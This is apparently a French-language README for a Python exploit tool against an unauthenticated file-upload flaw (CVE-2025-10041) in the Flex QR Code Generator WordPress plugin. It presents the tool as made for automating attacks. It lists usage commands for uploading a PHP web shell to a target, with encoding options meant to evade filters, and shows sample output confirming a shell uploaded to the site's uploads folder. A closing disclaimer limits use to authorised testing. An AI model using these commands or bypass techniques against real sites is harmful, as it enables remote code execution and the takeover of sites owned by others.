
Flex QR Code Generator <= 1.2.5 - Téléversement arbitraire de fichiers non authentifié
Flex QR Code Generator <= 1.2.5 - Téléchargement arbitraire de fichiers sans authentification
Le plugin Flex QR Code Generator pour WordPress est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction save_qr_code_to_db() dans toutes les versions jusqu'à la version 1.2.5 incluse.
Cela permet à des attaquants non authentifiés de télécharger des fichiers malveillants sur le serveur du site concerné, ce qui peut potentiellement conduire à une exécution de code à distance.
CVE-2025-100419.8 (Critique)CVE-2025-10041.py est un outil d'exploitation professionnel conçu pour automatiser l'attaque en exploitant cette vulnérabilité.
Il offre des fonctionnalités avancées pour contourner les protections courantes et les techniques d'encodage.
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
Pour voir toutes les options disponibles et les instructions d'utilisation :
python3 CVE-2025-10041.py --help
.php ou les noms suspects ; l'encodage peut contourner les filtres.eval(base64_decode(...)) peut contourner les filtres de contenu.Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
Ce script est fourni uniquement à des fins éducatives, de recherche et de tests d'intrusion autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement l'autorisation de tester est strictement interdite et illégale.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés par cet outil.
Nxploited (Khaled Alenazi)